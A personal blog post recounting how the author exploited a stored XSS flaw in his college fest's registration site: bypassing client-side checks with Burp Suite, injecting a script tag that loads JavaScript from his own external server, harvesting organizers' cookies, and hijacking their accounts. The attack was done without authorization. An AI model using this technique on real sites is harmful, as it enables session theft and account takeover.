
How I once hacked my College's Fest website

Updated: May 11, 2021

So this happened around 3 years ago. I study at a reputable university in South India (I would like to keep the name of the university private in this post), and we have two fests (short for festivals) every year.


Sure, these fests are fun for extroverts, but introverts like me would rather stay in their hostel room watching movies or playing video games.


I don't remember exactly, but I think it was around September 2018, and a fest was coming up!


I was in my second year of college back then and, being an introvert, I did not take part in any organizing team (there are different teams: development, art, sponsorship, etc.).


The fest is an All-India fest, meaning students from any university in India can register for events and visit them.

So there is a website (developed, I think, by senior-year students, though I'm not completely sure) on which anyone can browse all the events organized, their dates and timings, and register for them by paying online (or in cash on campus).


The organizers of the fest can also use this website to see the details of everyone who registered for their events, send them messages, cross-check their payments, etc.; basically, they can do some administration work.


The website had a registration form on which one registers by submitting their name, college registration number (or a username), phone, email, and college name.



I think I was just bored that day, and someone sent me a message with the website link asking me to register for some events (which I was not really interested in). I clicked on the link anyway, because now I had something to pass the time with.


Instead of filling in the registration form with my genuine details, I put values wrapped in HTML tags to test whether the form was vulnerable to XSS (Cross-Site Scripting).

When I tried to submit the form, a message popped up saying something like "Invalid Characters in the fields". I found that this validation was done by JavaScript running in the browser, so it only applies client-side: anything that bypasses the browser also bypasses the check.


I quickly fired up Burp Suite (a proxy tool for reading and modifying HTTP messages) and submitted the form again, this time without any HTML tags or other unusual characters. I intercepted this POST request in Burp and modified the field values there, putting back the HTML tags I had planned to use.




As you can see in the image above, I intercepted the request and modified the college-register field (the College Name field) to include a <script> tag.

The registration was successful!


After logging in with these credentials and opening the 'My Profile' page, which displays all the details I entered in the registration form (including the college name), the script tag I had injected into the college name field executed and I got an alert message.


This shows that the site is indeed vulnerable to XSS: the backend stores the value without any validation, and the profile page renders it into HTML without encoding it, so the browser-side check was the only protection.


So now I was thinking: when I register for an event, the organizers of that event will see my name along with my details (name, phone, email, college name).


But my college name contains a script tag, so whoever views my details (my college name, to be precise) will have the JavaScript I injected executed in their browser. This is stored XSS!


In simpler words, I can execute JavaScript in the organizers' browsers using this vulnerability.


So I quickly created a new account using the registration form, and this time I injected a script tag whose src attribute pointed to a JavaScript file hosted on my web server.


<script src="https://savedata156.000webhost.com/exploitweb.js"></script>



The reason for doing this is simple. Since I host the script on my own web server (reachable from the Internet), I can modify it at any time and the XSS payload changes accordingly: the injected tag loads whatever that publicly accessible URL currently serves, so I never have to touch the vulnerable site again.


Then I wrote some simple code in this js file that reads the current user's cookies and username and sends them to my web server in a GET request. That the cookies were readable from JavaScript at all means the site's session cookie was not marked HttpOnly.




On my web server, the received data is added to a database by some PHP code I wrote for this.



The next day, I logged back into my database to see if there were any entries.

And yes! There were many entries!


I downloaded the whole table as a CSV file to take a better look at it.



Each row contained the timestamp at which the details were received, the username of the account, and its cookies. I censored the usernames for obvious reasons.


Now that I have the cookies, I can simply log in to these compromised accounts!


I used a Cookie Editor browser extension to load these cookies and was logged in to their respective accounts; the site accepted the stolen session cookie as proof of identity, no password needed.




Now I have full access to the organizers' accounts!




With this, I could have done a lot (like registering myself for events for free).

However, I did not misuse it in any way, because that was not my intention. I was just bored after all!


Fortunately, this bug was fixed 3-4 days later, before the actual fest started.


The fest went great, so happy ending I guess? :)
